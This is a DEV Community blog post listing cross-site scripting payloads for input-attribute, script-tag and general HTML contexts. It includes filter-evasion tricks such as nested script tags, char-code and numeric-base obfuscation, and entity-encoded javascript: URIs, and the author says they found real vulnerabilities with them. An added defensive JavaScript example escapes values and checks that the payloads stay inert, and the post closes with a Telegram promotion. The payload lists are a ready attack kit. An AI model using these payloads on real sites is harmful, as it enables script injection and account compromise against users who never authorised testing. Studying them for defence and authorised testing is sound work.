DEV Community

vala broumand

Useful XSS Payloads

In this post I will show the top and most useful XSS payloads of 2022. I found XSS vulnerabilities in many web apps with some of the payloads below.

You can use the payloads below when you are dealing with an injection that lands inside the value of an input attribute:

```html
\"-alert(1)//
\'-alert(1)//
%26apos;-alert(1)-%26apos
'-alert(1)-'
```

Use these payloads when you are injecting inside a script tag:

```html
</script><img/src/onerror=alert(1)>
<a href="javascript:var a='&apos;-alert(1)-&apos;'">
```

And here are some common payloads:

```html
// Basic payload
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<script>\u0061lert('22')</script>
<script>eval('\x61lert(\'33\')')</script>
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
<object/data="jav&#x61;sc&#x72;ipt&#x3a;al&#x65;rt&#x28;23&#x29;">

// Img payload
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
```
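The defender's counterpart to the attribute-context and script-context payloads above, as an added example that is not from the post: encode the value for the context it lands in, then check the rendered markup structurally. The payload strings are copied from the post; the template shapes, escaper names and checks are my own construction.

```javascript
// Added example, not from the original post: encode a value for the context
// it lands in, then check the rendered markup structurally. Constructed input:
const ATTRIBUTE_PAYLOADS = [            // payloads the post lists for attribute values
  '\\"-alert(1)//',
  "'-alert(1)-'",
  '"><img src=x onerror=alert(\'XSS\');>',
];
const SCRIPT_PAYLOADS = [               // payloads the post lists for script blocks
  '</script><img/src/onerror=alert(1)>',
  "'-alert(1)-'",
];

// HTML attribute context: a quote closes the attribute and "<" opens a tag,
// so every character that can do either is turned into an entity.
const ATTR_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function escapeHtmlAttr(s) {
  return String(s).replace(/[&<>"']/g, (c) => ATTR_ENTITIES[c]);
}

// JavaScript string context: JSON.stringify quotes the value and escapes quotes
// and backslashes; "<" and "/" are escaped as well because the HTML parser runs
// before the JS parser and would honour a "</script>" inside the literal.
function toJsStringLiteral(s) {
  return JSON.stringify(String(s)).replace(/</g, '\\u003c').replace(/\//g, '\\/');
}

// Hardened templates beside the naive ones the payloads above are aimed at
// (template shapes are my assumption, not the post's).
const renderInputNaive  = (v) => `<input type="text" value="${v}">`;
const renderInput       = (v) => `<input type="text" value="${escapeHtmlAttr(v)}">`;
const renderScriptNaive = (v) => `<script>var a = '${v}';</script>`;
const renderScript      = (v) => `<script>var a = ${toJsStringLiteral(v)};</script>`;

// Structural checks: the rendered input must be exactly one element whose value
// holds no raw quote or angle bracket; in a rendered script block the only
// "</script" must be the template's own (quote breakout is JSON.stringify's job).
function attributeIntact(html) {
  const m = html.match(/^<input type="text" value="([^"]*)">$/);
  return m !== null && !/[<>"']/.test(m[1]);
}
function scriptIntact(html) {
  return (html.match(/<\/script/gi) || []).length === 1;
}

// True only if every payload stays inert in the hardened templates.
function allNeutralized() {
  return ATTRIBUTE_PAYLOADS.every((p) => attributeIntact(renderInput(p)))
      && SCRIPT_PAYLOADS.every((p) => scriptIntact(renderScript(p)));
}
```

Running the naive templates through the same checks shows which payload breaks which context, while the value stored in `a` after the browser decodes the escaped literal is unchanged.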

Find security and bug bounty books in my Telegram channel ==>
